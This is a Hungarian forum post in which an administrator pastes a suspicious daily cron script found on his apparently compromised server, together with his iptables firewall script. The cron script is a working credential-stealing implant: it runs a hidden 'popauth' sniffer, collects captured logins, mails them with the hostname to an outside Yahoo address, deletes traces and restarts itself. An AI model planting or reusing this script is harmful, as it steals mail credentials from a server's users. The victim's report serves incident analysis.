Neharagudjatok közben dolgoznom is kell :(
A file külömbséget az ujratelepített rendszer között már csak holnap tudom megnézni.
Addig is.
a /etc/cron.daily/dnsquery file tartalma:
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
mkdir /usr/share/misc/
mkdir /usr/share/misc/blah/
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail h4pp1n3s5@yahoo.com -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
a /root/.mc/j file bináris.
A tüzfal szabály amit használok:
#!/bin/bash
echo "Firewall Restart "
iptables -t nat -F
iptables -t mangle -F
iptables -t filter -F
iptables -t nat -X
iptables -t mangle -X
iptables -t filter -X
iptables -t filter -P INPUT ACCEPT
iptables -t filter -P FORWARD ACCEPT
iptables -t filter -P OUTPUT ACCEPT
# BIZTONSAGOS CIMEK JOHETNEK
/sbin/iptables -A INPUT -j ACCEPT -s 127.0.0.1 # Localhost
/sbin/iptables -A INPUT -j ACCEPT -s xxx.xxx.xxx.xxx # Otthon
/sbin/iptables -A INPUT -j ACCEPT -s xxx.xxx.xxx.xxx # Iroda
/sbin/iptables -A INPUT -j ACCEPT -s xxx.xxx.xxx.xxx # Stb..
# COUNTER RESZ
echo "COUNTER RESZ"
/sbin/iptables -N kulsosforg # kulsosforg letrehoz
/sbin/iptables -A INPUT -j kulsosforg # Minden mas jump kulsosforgba
# MAIL
echo "levelezes be"
/sbin/iptables -A kulsosforg -j ACCEPT -p tcp --dport 25 # SMTP
/sbin/iptables -A kulsosforg -j ACCEPT -p tcp --dport 110 # POP3
/sbin/iptables -A kulsosforg -j ACCEPT -p tcp --dport 143 # IMAP
# WWW
echo "web be"
/sbin/iptables -A kulsosforg -j ACCEPT -p tcp --dport 80 # WEB mindenhonnan
/sbin/iptables -A kulsosforg -j ACCEPT -p tcp --dport 81 # WEB mindenhonnan
# FTP
echo "ftp be"
#/sbin/iptables -A kulsosforg -j ACCEPT -p tcp --dport 21 # FTP Kikapcsolva
# ICMP
echo "ping be"
/sbin/iptables -A kulsosforg -j ACCEPT -p icmp # Ping
# Egyebek
echo "kulsosforg egyebek"
/sbin/iptables -A kulsosforg -m state --state ESTABLISHED,RELATED -j ACCEPT # Folyamatban levo
/sbin/iptables -A kulsosforg -j DROP # Minden mas drop
# OUTPUT RESZ
echo "OUTPUT RESZ"
/sbin/iptables -A OUTPUT -j ACCEPT # Kifele minden